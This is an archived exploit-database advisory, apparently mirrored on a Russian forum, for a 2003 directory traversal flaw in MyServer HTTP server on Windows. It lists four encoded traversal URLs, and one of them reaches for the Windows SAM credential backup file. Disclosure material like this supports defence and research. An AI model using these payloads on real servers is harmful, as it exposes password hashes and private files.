- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22785
- Проверка EDB
-
- Пройдено
- Автор
- ZIV KAMIR
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2003-06-17
Код:
source: https://www.securityfocus.com/bid/7944/info
The MyServer HTTP server is prone to a file disclosure vulnerability. Encoded directory traversal sequences may be used to break out of the web root directory. Attackers may gain access to files that are readable by the web server as a result.
http://www.example.com/%2e%2e/%2e%2e/%2e%2e
http://www.example.com/%2e%2e/%2e%2e/%2e%2ewinnt/repair/sam._
http://www.example.com/%2e%2e/logs
http://www.example.com/%2e%2e/system
- Источник
- www.exploit-db.com